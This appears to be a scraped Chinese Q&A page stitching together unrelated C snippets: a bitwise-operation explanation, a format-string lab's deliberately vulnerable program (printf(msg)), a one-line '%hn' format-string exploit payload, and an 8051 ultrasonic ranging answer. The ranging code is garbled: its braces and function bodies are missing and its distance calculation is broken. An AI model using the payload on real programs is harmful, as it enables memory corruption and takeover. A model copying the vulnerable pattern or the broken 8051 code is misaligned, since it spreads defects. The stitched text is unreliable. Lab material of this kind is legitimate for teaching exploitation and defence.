#include<stdio.h> int main() { unsigned char a,b,c; a =0x3; b= a|0x8; c=b<<1; printf("%d %d\n",b,c); return 0; }
时间: 2024-03-23 09:36:32 浏览: 104
这段代码中定义了三个无符号字符变量a、b、c,a被赋值为0x3,b被赋值为a按位或上0x8的结果,即二进制的0011 | 1000 = 1011,转为十进制为11。c被赋值为b左移一位的结果,即二进制的1011 << 1 = 10110,转为十进制为22。最后打印出b和c的十进制值,即11和22。输出结果为:
11 22
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/socket.h> #include <netinet/ip.h> #define PORT 9090 /* Changing this size will change the layout of the stack. * We have added 2 dummy arrays: in main() and myprintf(). * Instructors can change this value each year, so students * won’t be able to use the solutions from the past. * Suggested value: between 0 and 300 */ #ifndef DUMMY_SIZE #define DUMMY_SIZE 100 #endif char *secret = "A secret message\n"; unsigned int target = 0x11223344; void myprintf(char *msg) { uintptr_t framep; // Copy the ebp value into framep, and print it out asm("movl %%ebp, %0" : "=r"(framep)); printf("The ebp value inside myprintf() is: 0x%.8x\n", framep); /* Change the size of the dummy array to randomize the parameters for this lab. Need to use the array at least once */ char dummy[DUMMY_SIZE]; memset(dummy, 0, DUMMY_SIZE); // This line has a format string vulnerability printf(msg); printf("The value of the ’target’ variable (after): 0x%.8x\n", target); }
./vulnerable $(python -c "print('\x28\xa0\x04\x08' + '%4c%hn'*2)")
#include<REG52.H> #include<stdio.h> #include <intrins.h> sbit Trig=P2^0; sbit Echo=P2^1;超声模块测距代码补全
`#include<REG52.H>`是一段头文件的引用,代表使用了基于Intel 8051的单片机开发环境。`<stdio.h>`是标准输入输出头文件的引用。`<intrins.h>`是用于特殊函数的头文件引用。
#include <intrins.h>
sbit Trig=P2^0;
sbit Echo=P2^1;
void delay(unsigned int us) //延时函数
unsigned char read_distance() //读取距离函数
unsigned char distance;
Trig = 0; //初始化
Trig = 1; //触发测量
Trig = 0; //停止测量
while(!Echo); //等待Echo为高电平
TH0 = 0;
TL0 = 0; //清零计时器
while(Echo); //等待Echo为低电平
distance = (unsigned char)(TH0*256+TL0)/58.0; //计算距离
return distance;
void main()
unsigned char distance;
TMOD |= 0x01; //设置为定时器0,工作方式1
distance = read_distance(); //读取距离
printf("The distance is %d cm\n",distance); //打印距离
delay(500); //延时500ms